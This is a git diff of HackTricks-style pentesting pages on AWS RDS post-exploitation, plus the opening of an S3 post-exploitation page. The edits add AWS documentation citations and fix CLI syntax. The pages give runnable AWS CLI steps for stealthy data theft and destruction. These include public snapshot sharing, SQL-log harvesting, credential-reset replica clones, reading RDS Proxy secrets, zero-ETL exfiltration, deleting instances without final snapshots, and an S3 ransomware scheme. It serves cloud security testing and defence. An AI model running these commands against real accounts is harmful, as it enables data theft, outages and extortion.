-An attacker with rds:StopDBCluster or rds:StopDBInstance can force an immediate stop of an RDS instance or an entire cluster, causing database unavailability, broken connections, and interruption of processes that depend on the database.
+An attacker with `rds:StopDBCluster` or `rds:StopDBInstance` can stop an RDS instance or Aurora cluster; while stopped, clients lose database availability and dependent processes can fail.<sup>[[3]](#references)[[4]](#references)</sup>
 
 To stop a single DB instance (example):
 
@@ -58,7 +56,7 @@ aws rds stop-db-cluster \
 ```
 
 ### `rds:Modify*`
-An attacker granted rds:Modify* permissions can alter critical configurations and auxiliary resources (parameter groups, option groups, proxy endpoints and endpoint-groups, target groups, subnet groups, capacity settings, snapshot/cluster attributes, certificates, integrations, etc.) without touching the instance or cluster directly. Changes such as adjusting connection/time-out parameters, changing a proxy endpoint, modifying which certificates are trusted, altering logical capacity, or reconfiguring a subnet group can weaken security (open new access paths), break routing and load-balancing, invalidate replication/backup policies, and generally degrade availability or recoverability. These modifications can also facilitate indirect data exfiltration or hinder an orderly recovery of the database after an incident.
+An attacker granted the relevant `rds:Modify*` permissions can alter critical configurations and auxiliary resources (parameter groups, option groups, proxy endpoints and endpoint-groups, target groups, subnet groups, capacity settings, snapshot/cluster attributes, certificates, integrations, etc.) without touching the instance or cluster directly. AWS exposes these as separate write actions, so the effective scope depends on which Modify actions and resources the policy grants.<sup>[[5]](#references)</sup> Changes such as adjusting connection/time-out parameters, changing a proxy endpoint, modifying which certificates are trusted, altering logical capacity, or reconfiguring a subnet group can weaken security (open new access paths), break routing and load-balancing, invalidate replication/backup policies, and generally degrade availability or recoverability. These modifications can also facilitate indirect data exfiltration or hinder an orderly recovery of the database after an incident.
 
 Move or change the subnets assigned to an RDS subnet group:
 
@@ -78,7 +76,7 @@ aws rds modify-db-cluster-parameter-group \
 
 ### `rds:Restore*`
 
-An attacker with rds:Restore* permissions can restore entire databases from snapshots, automated backups, point-in-time recovery (PITR), or files stored in S3, creating new instances or clusters populated with the data from the selected point. These operations do not overwrite the original resources — they create new objects containing the historical data — which allows an attacker to obtain full, functional copies of the database (from past points in time or from external S3 files) and use them to exfiltrate data, manipulate historical records, or rebuild previous states.
+An attacker with the applicable `rds:Restore*` permissions can restore entire databases from snapshots, automated backups, point-in-time recovery (PITR), or files stored in S3, creating new instances or clusters populated with the data from the selected point. These operations do not overwrite the original resources — they create new objects containing the historical data — which allows an attacker to obtain full, functional copies of the database (from past points in time or from external S3 files) and use them to exfiltrate data, manipulate historical records, or rebuild previous states.<sup>[[1]](#references)[[5]](#references)[[6]](#references)[[7]](#references)[[40]](#references)</sup>
 
 Restore a DB instance to a specific point in time:
 
@@ -93,7 +91,7 @@ aws rds restore-db-instance-to-point-in-time \
 
 ### `rds:Delete*`
 
-An attacker granted rds:Delete* can remove RDS resources, deleting DB instances, clusters, snapshots, automated backups, subnet groups, parameter/option groups and related artifacts, causing immediate service outage, data loss, destruction of recovery points and loss of forensic evidence.
+An attacker granted the relevant `rds:Delete*` permissions can remove RDS resources, deleting DB instances, clusters, snapshots, automated backups, subnet groups, parameter/option groups and related artifacts, causing immediate service outage, data loss, destruction of recovery points and loss of forensic evidence.<sup>[[5]](#references)[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 # Delete a DB instance (creates a final snapshot unless you skip it)
@@ -118,9 +116,9 @@ aws rds delete-db-cluster \
 
 ### `rds:ModifyDBSnapshotAttribute`, `rds:CreateDBSnapshot`
 
-An attacker with these permissions could **create an snapshot of a DB** and make it **publicly** **available**. Then, he could just create in his own account a DB from that snapshot.
+An attacker with these permissions could **create a manual snapshot of a DB** and share it with another account or, for an unencrypted manual snapshot, make it **publicly restorable**. The recipient can copy or restore the shared snapshot according to RDS rules.<sup>[[10]](#references)</sup>
 
-If the attacker **doesn't have the `rds:CreateDBSnapshot`**, he still could make **other** created snapshots **public**.
+If the attacker **doesn't have the `rds:CreateDBSnapshot`**, he still could make **existing manual snapshots** public or share them when allowed by `rds:ModifyDBSnapshotAttribute`.<sup>[[10]](#references)</sup>
 
 ```bash
 # create snapshot
@@ -128,46 +126,47 @@ aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --d
 
 # Make it public/share with attackers account
 aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
-## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
+# Specify account IDs instead of "all" to give access only to specific accounts:
+# --values-to-add 111122223333 444455556666
 ```
 
 ### `rds:DownloadDBLogFilePortion`
 
-An attacker with the `rds:DownloadDBLogFilePortion` permission can **download portions of an RDS instance's log files**. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions.
+An attacker with the `rds:DownloadDBLogFilePortion` permission can **download portions of an RDS instance's log files**. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions.<sup>[[11]](#references)[[14]](#references)</sup>
 
 ```bash
 aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
 ```
 
-**Potential Impact**: Access to sensitive information or unauthorized actions using leaked credentials.
+**Potential Impact**: Access to sensitive information or unauthorized actions using leaked credentials.<sup>[[11]](#references)[[12]](#references)</sup>
 
 ### `rds:DeleteDBInstance`
 
-An attacker with these permissions can **DoS existing RDS instances**.
+An attacker with these permissions can **DoS existing RDS instances**.<sup>[[5]](#references)[[8]](#references)</sup>
 
 ```bash
 # Delete
 aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
 ```
 
-**Potential impact**: Deletion of existing RDS instances, and potential loss of data.
+**Potential impact**: Deletion of existing RDS instances, and potential loss of data.<sup>[[8]](#references)</sup>
 
 ### `rds:StartExportTask`
 
 > [!NOTE]
 > TODO: Test
 
-An attacker with this permission can **export an RDS instance snapshot to an S3 bucket**. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot.
+An attacker with this permission can **export an RDS instance snapshot to an S3 bucket**. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot.<sup>[[15]](#references)</sup>
 
 ```bash
 aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
 ```
 
-**Potential impact**: Access to sensitive data in the exported snapshot.
+**Potential impact**: Access to sensitive data in the exported snapshot.<sup>[[15]](#references)</sup>
 
 ### Cross-Region Automated Backups Replication for Stealthy Restore (`rds:StartDBInstanceAutomatedBackupsReplication`)
 
-Abuse cross-Region automated backups replication to quietly duplicate an RDS instance's automated backups into another AWS Region and restore there. The attacker can then make the restored DB publicly accessible and reset the master password to access data out-of-band in a Region defenders might not monitor.
+Abuse cross-Region automated backups replication to quietly duplicate an RDS instance's automated backups into another AWS Region and restore there. The attacker can then make the restored DB publicly accessible and reset the master password to access data out-of-band in a Region defenders might not monitor.<sup>[[2]](#references)[[6]](#references)[[16]](#references)[[17]](#references)</sup>
 
 Permissions needed (minimum):
 - `rds:StartDBInstanceAutomatedBackupsReplication` in the destination Region
@@ -177,7 +176,9 @@ Permissions needed (minimum):
 - `rds:StopDBInstanceAutomatedBackupsReplication` (optional cleanup)
 - `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress` (to expose the restored DB)
 
-Impact: Persistence and data exfiltration by restoring a copy of production data into another Region and exposing it publicly with attacker-controlled credentials.
+The optional cleanup command stops replication; replicated backups are retained according to the documented retention behavior.<sup>[[18]](#references)</sup>
+
+Impact: Persistence and data exfiltration by restoring a copy of production data into another Region and exposing it publicly with attacker-controlled credentials.<sup>[[2]](#references)[[6]](#references)[[16]](#references)</sup>
 
 <details>
 <summary>End-to-end CLI (replace placeholders)</summary>
@@ -252,9 +253,9 @@ aws rds stop-db-instance-automated-backups-replication \
 
 ### Enable full SQL logging via DB parameter groups and exfiltrate via RDS log APIs
 
-Abuse `rds:ModifyDBParameterGroup` with RDS log download APIs to capture all SQL statements executed by applications (no DB engine credentials needed). Enable engine SQL logging and pull the file logs via `rds:DescribeDBLogFiles` and `rds:DownloadDBLogFilePortion` (or the REST `downloadCompleteLogFile`). Useful to collect queries that may contain secrets/PII/JWTs.
+Abuse `rds:ModifyDBParameterGroup` with RDS log download APIs to capture all SQL statements executed by applications (no DB engine credentials needed). Enable engine SQL logging and pull the file logs via `rds:DescribeDBLogFiles` and `rds:DownloadDBLogFilePortion` (or the REST `downloadCompleteLogFile`). Useful to collect queries that may contain secrets/PII/JWTs.<sup>[[11]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
 
-Permissions needed (minimum):
+Permissions needed (minimum):<sup>[[5]](#references)[[11]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
 - `rds:DescribeDBInstances`, `rds:DescribeDBLogFiles`, `rds:DownloadDBLogFilePortion`
 - `rds:CreateDBParameterGroup`, `rds:ModifyDBParameterGroup`
 - `rds:ModifyDBInstance` (only to attach a custom parameter group if the instance is using the default one)
@@ -268,7 +269,7 @@ aws rds describe-db-instances \
   --output table
 ```
 
-2) Ensure a custom DB parameter group is attached (cannot edit the default)
+2) Ensure a custom DB parameter group is attached (cannot edit the default).<sup>[[38]](#references)</sup>
 - If the instance already uses a custom group, reuse its name in the next step.
 - Otherwise create and attach one matching the engine family:
 ```bash
@@ -311,11 +312,11 @@ aws rds modify-db-parameter-group \
 aws rds reboot-db-instance --db-instance-identifier <DB>
 ```
 
-4) Let the workload run (or generate queries). Statements will be written to engine file logs
+4) Let the workload run (or generate queries). Statements will be written to engine file logs.<sup>[[12]](#references)[[13]](#references)</sup>
 - MySQL: `general/mysql-general.log`
 - PostgreSQL: `postgresql.log`
 
-5) Discover and download logs (no DB creds required)
+5) Discover and download logs (no DB creds required).<sup>[[11]](#references)[[14]](#references)</sup>
 ```bash
 aws rds describe-db-log-files --db-instance-identifier <DB>
 
@@ -356,11 +357,11 @@ aws rds modify-db-parameter-group \
 # Reboot if pending-reboot
 ```
 
-Impact: Post-exploitation data access by capturing all application SQL statements via AWS APIs (no DB creds), potentially leaking secrets, JWTs, and PII.
+Impact: Post-exploitation data access by capturing all application SQL statements via AWS APIs (no DB creds), potentially leaking secrets, JWTs, and PII.<sup>[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
 ### `rds:CreateDBInstanceReadReplica`, `rds:ModifyDBInstance`
 
-Abuse RDS read replicas to gain out-of-band read access without touching the primary instance credentials. An attacker can create a read replica from a production instance, reset the replica's master password (this does not change the primary), and optionally expose the replica publicly to exfiltrate data.
+Abuse RDS read replicas to gain out-of-band read access without touching the primary instance credentials. A read replica is an asynchronously updated, read-only copy; modifying the replica's instance settings targets that separate DB instance, so the workflow can use replica credentials while the source remains the primary.<sup>[[2]](#references)[[19]](#references)[[20]](#references)</sup>
 
 Permissions needed (minimum):
 - `rds:DescribeDBInstances`
@@ -368,7 +369,7 @@ Permissions needed (minimum):
 - `rds:ModifyDBInstance`
 - `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress` (if exposing publicly)
 
-Impact: Read-only access to production data via a replica with attacker-controlled credentials; lower detection likelihood as the primary remains untouched and replication continues.
+Impact: Read-only access to production data via a replica with attacker-controlled credentials; lower detection likelihood as the primary remains untouched and replication continues.<sup>[[19]](#references)</sup>
 
 ```bash
 # 1) Recon: find non-Aurora sources with backups enabled
@@ -403,24 +404,24 @@ REPL_ENDPOINT=$(aws rds describe-db-instances --db-instance-identifier <REPL_ID>
 
 Example evidence (MySQL):
 - Replica DB status: `available`, read replication: `replicating`
-- Successful connection with new password and `@@read_only=1` confirming read-only replica access.
+- Successful connection with new password and `@@read_only=1` confirming read-only replica access.<sup>[[19]](#references)</sup>
 
 ### `rds:CreateBlueGreenDeployment`, `rds:ModifyDBInstance`
 
-Abuse RDS Blue/Green to clone a production DB into a continuously replicated, read‑only green environment. Then reset the green master credentials to access the data without touching the blue (prod) instance. This is stealthier than snapshot sharing and often bypasses monitoring focused only on the source.
+Abuse RDS Blue/Green to clone a production DB into a continuously replicated, read‑only green environment. Then reset the green master credentials to access the data without touching the blue (prod) instance. The green environment stays synchronized with blue and is read-only by default, while RDS allows additional modifications to green without affecting production.<sup>[[2]](#references)[[21]](#references)[[22]](#references)</sup>
 
 ```bash
 # 1) Recon – find eligible source (non‑Aurora MySQL/PostgreSQL in the same account)
 aws rds describe-db-instances \
   --query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,EngineVersion,DBSubnetGroup.DBSubnetGroupName,PubliclyAccessible]'
 
-# Ensure: automated backups enabled on source (BackupRetentionPeriod > 0), no RDS Proxy, supported engine/version
+# Ensure: automated backups enabled on source (BackupRetentionPeriod > 0), supported engine/version
 
 # 2) Create Blue/Green deployment (replicates blue->green continuously)
 aws rds create-blue-green-deployment \
   --blue-green-deployment-name ht-bgd-attack \
-  --source <BLUE_DB_ARN> \
-  # Optional to upgrade: --target-engine-version <same-or-higher-compatible>
+  --source <BLUE_DB_ARN>
+# Optional to upgrade: add --target-engine-version <same-or-higher-compatible>
 
 # Wait until deployment Status becomes AVAILABLE, then note the green DB id
 aws rds describe-blue-green-deployments \
@@ -453,22 +454,24 @@ aws rds describe-db-instances \
 # 5) Cleanup – remove blue/green and the green resources
 aws rds delete-blue-green-deployment \
   --blue-green-deployment-identifier <BGD_ID> \
-  --delete-target true
+  --delete-target
 ```
 
-Impact: Read-only but full data access to a near-real-time clone of production without modifying the production instance. Useful for stealthy data extraction and offline analysis.
+Impact: Read-only but full data access to a near-real-time clone of production without modifying the production instance. Useful for stealthy data extraction and offline analysis.<sup>[[21]](#references)[[22]](#references)</sup>
 
 
 ### Out-of-band SQL via RDS Data API by enabling HTTP endpoint + resetting master password
 
-Abuse Aurora to enable the RDS Data API HTTP endpoint on a target cluster, reset the master password to a value you control, and run SQL over HTTPS (no VPC network path required). Works on Aurora engines that support the Data API/EnableHttpEndpoint (e.g., Aurora MySQL 8.0 provisioned; some Aurora PostgreSQL/MySQL versions).
+Abuse Aurora to enable the RDS Data API HTTP endpoint on a target cluster, reset the master password to a value you control, and run SQL over HTTPS (no VPC network path required). Data API availability is version- and Region-dependent, and it supports provisioned and Serverless Aurora clusters where available.<sup>[[23]](#references)[[24]](#references)[[39]](#references)</sup>
 
-Permissions (minimum):
+Permissions (minimum):<sup>[[5]](#references)[[23]](#references)[[25]](#references)[[26]](#references)[[30]](#references)</sup>
 - rds:DescribeDBClusters, rds:ModifyDBCluster (or rds:EnableHttpEndpoint)
 - secretsmanager:CreateSecret
+- secretsmanager:GetSecretValue on the secret used by Data API
+- kms:Decrypt on the customer-managed key, if that secret uses a CMK
 - rds-data:ExecuteStatement (and rds-data:BatchExecuteStatement if used)
 
-Impact: Bypass network segmentation and exfiltrate data via AWS APIs without direct VPC connectivity to the DB.
+Impact: Bypass network segmentation and exfiltrate data via AWS APIs without direct VPC connectivity to the DB.<sup>[[24]](#references)[[25]](#references)[[26]](#references)</sup>
 
 <details>
 <summary>End-to-end CLI (Aurora MySQL example)</summary>
@@ -506,8 +509,10 @@ while :; do
 done
 
 # 4) Create a Secrets Manager secret for Data API auth
+MASTER_USERNAME=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID \
+  --query 'DBClusters[0].MasterUsername' --output text)
 SECRET_ARN=$(aws secretsmanager create-secret --region $REGION --name rdsdata/demo-$CLUSTER_ID \
-  --secret-string '{"username":"admin","password":"Sup3rStr0ng!1"}' \
+  --secret-string "{\"username\":\"$MASTER_USERNAME\",\"password\":\"Sup3rStr0ng!1\"}" \
   --query ARN --output text)
 
 # 5) Prove out-of-band SQL via HTTPS using rds-data
@@ -526,28 +531,28 @@ aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
 </details>
 
 Notes:
-- If multi-statement SQL is rejected by rds-data, issue separate execute-statement calls.
-- For engines where modify-db-cluster --enable-http-endpoint has no effect, use rds enable-http-endpoint --resource-arn.
-- Ensure the engine/version actually supports the Data API; otherwise HttpEndpointEnabled will remain False.
+- If multi-statement SQL is rejected by rds-data, issue separate execute-statement calls.<sup>[[26]](#references)</sup>
+- For engines where modify-db-cluster --enable-http-endpoint has no effect, use rds enable-http-endpoint --resource-arn.<sup>[[23]](#references)</sup>
+- Ensure the engine/version actually supports the Data API; otherwise HttpEndpointEnabled will remain False.<sup>[[23]](#references)</sup>
 
 
 ### Harvest DB credentials via RDS Proxy auth secrets (`rds:DescribeDBProxies` + `secretsmanager:GetSecretValue`)
 
-Abuse RDS Proxy configuration to discover the Secrets Manager secret used for backend authentication, then read the secret to obtain database credentials. Many environments grant broad `secretsmanager:GetSecretValue`, making this a low-friction pivot to DB creds. If the secret uses a CMK, mis-scoped KMS permissions may also allow `kms:Decrypt`.
+Abuse RDS Proxy configuration to discover the Secrets Manager secret(s) used for backend authentication, then read those secrets if the caller is authorized. RDS Proxy can use multiple Secrets Manager secrets or end-to-end IAM authentication; a customer-managed KMS key also requires `kms:Decrypt` to read the secret.<sup>[[27]](#references)[[28]](#references)[[29]](#references)[[30]](#references)</sup>
 
-Permissions needed (minimum):
+Permissions needed (minimum):<sup>[[5]](#references)[[27]](#references)[[28]](#references)[[30]](#references)</sup>
 - `rds:DescribeDBProxies`
 - `secretsmanager:GetSecretValue` on the referenced SecretArn
 - Optional when the secret uses a CMK: `kms:Decrypt` on that key
 
-Impact: Immediate disclosure of DB username/password configured on the proxy; enables direct DB access or further lateral movement.
+Impact: Immediate disclosure of DB username/password configured on the proxy; enables direct DB access or further lateral movement.<sup>[[27]](#references)[[28]](#references)[[30]](#references)</sup>
 
 Steps
 ```bash
 # 1) Enumerate proxies and extract the SecretArn used for auth
 aws rds describe-db-proxies \
-  --query DBProxies[*].[DBProxyName,Auth[0].AuthScheme,Auth[0].SecretArn] \
-  --output table
+  --query 'DBProxies[*].{Proxy:DBProxyName,SecretArns:Auth[].SecretArn}' \
+  --output json
 
 # 2) Read the secret value (common over-permission)
 aws secretsmanager get-secret-value \
@@ -562,16 +567,19 @@ REGION=us-east-1
 ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
 SECRET_ARN=$(aws secretsmanager create-secret \
   --region $REGION --name rds/proxy/aurora-demo \
-  --secret-string username:admin \
+  --secret-string '{"username":"admin","password":"S3cr3t!"}' \
   --query ARN --output text)
+cat > trust-policy.json <<'JSON'
+{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"rds.amazonaws.com"},"Action":"sts:AssumeRole"}]}
+JSON
 aws iam create-role --role-name rds-proxy-secret-role \
-  --assume-role-policy-document Version:2012-10-17
+  --assume-role-policy-document file://trust-policy.json
 aws iam attach-role-policy --role-name rds-proxy-secret-role \
   --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
 aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \
-  --auth [AuthScheme:SECRETS] \
+  --auth "AuthScheme=SECRETS,SecretArn=$SECRET_ARN" \
   --role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \
-  --vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query Subnets[].SubnetId --output text)
+  --vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query 'Subnets[].SubnetId' --output text)
 aws rds wait db-proxy-available --db-proxy-name p0
 # Now run the enumeration + secret read from the Steps above
 ```
@@ -586,9 +594,9 @@ aws secretsmanager delete-secret --secret-id rds/proxy/aurora-demo --force-delet
 
 ### Stealthy continuous exfiltration via Aurora zero‑ETL to Amazon Redshift (rds:CreateIntegration)
 
-Abuse Aurora PostgreSQL zero‑ETL integration to continuously replicate production data into a Redshift Serverless namespace you control. With a permissive Redshift resource policy that authorizes CreateInboundIntegration/AuthorizeInboundIntegration for a specific Aurora cluster ARN, an attacker can establish a near‑real‑time data copy without DB creds, snapshots or network exposure.
+Abuse an Aurora PostgreSQL zero‑ETL integration to continuously replicate production data into a Redshift Serverless namespace you control. With a permissive Redshift resource policy that authorizes `CreateInboundIntegration`/`AuthorizeInboundIntegration` for a specific Aurora cluster ARN, an attacker can establish a near‑real‑time data copy through the AWS control plane without DB credentials, snapshots, or a network path to the source.<sup>[[31]](#references)[[32]](#references)[[33]](#references)[[34]](#references)</sup>
 
-Permissions needed (minimum):
+Permissions needed (minimum):<sup>[[5]](#references)[[33]](#references)[[34]](#references)</sup>
 - `rds:CreateIntegration`, `rds:DescribeIntegrations`, `rds:DeleteIntegration`
 - `redshift:PutResourcePolicy`, `redshift:DescribeInboundIntegrations`, `redshift:DescribeIntegrations`
 - `redshift-data:ExecuteStatement/GetStatementResult/ListDatabases` (to query)
@@ -710,7 +718,49 @@ Evidence observed in test:
 - SVV_INTEGRATION showed integration_id 377a462b-c42c-4f08-937b-77fe75d98211 and state PendingDbConnectState prior to DB creation.
 - After CREATE DATABASE FROM INTEGRATION, listing tables revealed schema ztl and table customers; selecting from ztl.customers returned 2 rows (Alice, Bob).
 
-Impact: Continuous near‑real‑time exfiltration of selected Aurora PostgreSQL tables into Redshift Serverless controlled by the attacker, without using database credentials, backups, or network access to the source cluster.
+Impact: Continuous near‑real‑time exfiltration of selected Aurora PostgreSQL tables into Redshift Serverless controlled by the attacker, without using database credentials, backups, or network access to the source cluster.<sup>[[31]](#references)[[33]](#references)[[35]](#references)[[36]](#references)[[37]](#references)</sup>
 
+## References
+
+- [1] [Restoring to a DB instance - Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_RestoreFromSnapshot.html)
+- [2] [ModifyDBInstance - Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBInstance.html)
+- [3] [Stopping an Amazon RDS DB instance temporarily](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_StopInstance.html)
+- [4] [StopDBCluster - Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_StopDBCluster.html)
+- [5] [Actions, resources, and condition keys for Amazon RDS](https://docs.aws.amazon.com/service-authorization/latest/reference/list_rds.html)
+- [6] [Restoring a DB instance to a specified time for Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_PIT.html)
+- [7] [RestoreDBInstanceFromS3 - Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_RestoreDBInstanceFromS3.html)
+- [8] [Deleting a DB instance](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_DeleteInstance.html)
+- [9] [Deleting Aurora DB clusters and DB instances](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_DeleteCluster.html)
+- [10] [Sharing a DB snapshot for Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ShareSnapshot.html)
+- [11] [Monitoring Amazon RDS log files](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_LogAccess.html)
+- [12] [Overview of RDS for MySQL database logs](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_LogAccess.MySQL.LogFileSize.html)
+- [13] [Turning on query logging for your RDS for PostgreSQL DB instance](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_LogAccess.Concepts.PostgreSQL.Query_Logging.html)
+- [14] [Downloading a database log file](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_LogAccess.Procedural.Downloading.html)
+- [15] [StartExportTask - Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_StartExportTask.html)
+- [16] [Enabling cross-Region automated backups for Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/AutomatedBackups.Replicating.Enable.html)
+- [17] [Finding information about replicated backups for Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/AutomatedBackups.Replicating.Describe.html)
+- [18] [Stopping automated backup replication for Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/AutomatedBackups.StopReplicating.html)
+- [19] [Working with DB instance read replicas](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ReadRepl.html)
+- [20] [Creating a read replica](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ReadRepl.Create.html)
+- [21] [Overview of Amazon RDS Blue/Green Deployments](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/blue-green-deployments-overview.html)
+- [22] [Creating a blue/green deployment in Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/blue-green-deployments-creating.html)
+- [23] [Enabling the Amazon RDS Data API](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/data-api.enabling.html)
+- [24] [Using the Amazon RDS Data API](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/data-api.html)
+- [25] [Authorizing access to the Amazon RDS Data API](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/data-api.access.html)
+- [26] [ExecuteStatement - RDS Data API](https://docs.aws.amazon.com/rdsdataservice/latest/APIReference/API_ExecuteStatement.html)
+- [27] [Amazon RDS Proxy](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/rds-proxy.html)
+- [28] [Setting up database credentials for RDS Proxy](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/rds-proxy-secrets-arns.html)
+- [29] [Viewing a proxy](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/rds-proxy-viewing.html)
+- [30] [get-secret-value - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/get-secret-value.html)
+- [31] [Aurora zero-ETL integrations](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/zero-etl.html)
+- [32] [Getting started with Aurora zero-ETL integrations](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/zero-etl.setting-up.html)
+- [33] [Creating Aurora zero-ETL integrations with Amazon Redshift](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/zero-etl.creating.html)
+- [34] [Configure authorization for your Amazon Redshift data warehouse](https://docs.aws.amazon.com/redshift/latest/mgmt/zero-etl-using.redshift-iam.html)
+- [35] [Creating destination databases in Amazon Redshift](https://docs.aws.amazon.com/redshift/latest/mgmt/zero-etl-using.creating-db.html)
+- [36] [SVV_INTEGRATION - Amazon Redshift](https://docs.aws.amazon.com/redshift/latest/dg/r_SVV_INTEGRATION.html)
+- [37] [Data filtering for Aurora zero-ETL integrations](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/zero-etl.filtering.html)
+- [38] [Modifying parameters in a DB parameter group in Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithParamGroups.Modifying.html)
+- [39] [ModifyDBCluster - Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBCluster.html)
+- [40] [RestoreDBClusterFromS3 - Amazon RDS](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_RestoreDBClusterFromS3.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - S3 Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## S3
 
 For more information check:
@@ -21,62 +19,68 @@ For example, **airflow** could be storing **DAGs** **code** in there, or **web p
 
 ### S3 Ransomware
 
-In this scenario, the **attacker creates a KMS (Key Management Service) key in their own AWS account** or another compromised account. They then make this **key accessible to anyone in the world**, allowing any AWS user, role, or account to encrypt objects using this key. However, the objects cannot be decrypted.
+In this scenario, the **attacker creates a KMS (Key Management Service) key in their own AWS account** or another compromised account. They then make this **key accessible to anyone in the world**, allowing any AWS user, role, or account to encrypt objects using this key. Principals without `kms:Decrypt` access to the key cannot decrypt the resulting objects.<sup>[[1]](#references)</sup>
 
-The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more.
+The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more.<sup>[[1]](#references)</sup>
 
-To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.
+To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **suspend Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.<sup>[[1]](#references)[[3]](#references)[[21]](#references)</sup>
 
-Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. This effectively encrypts the data in the bucket, making it inaccessible without the key.
+Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. This effectively encrypts the data in the bucket, making it inaccessible without the key.<sup>[[1]](#references)</sup>
 
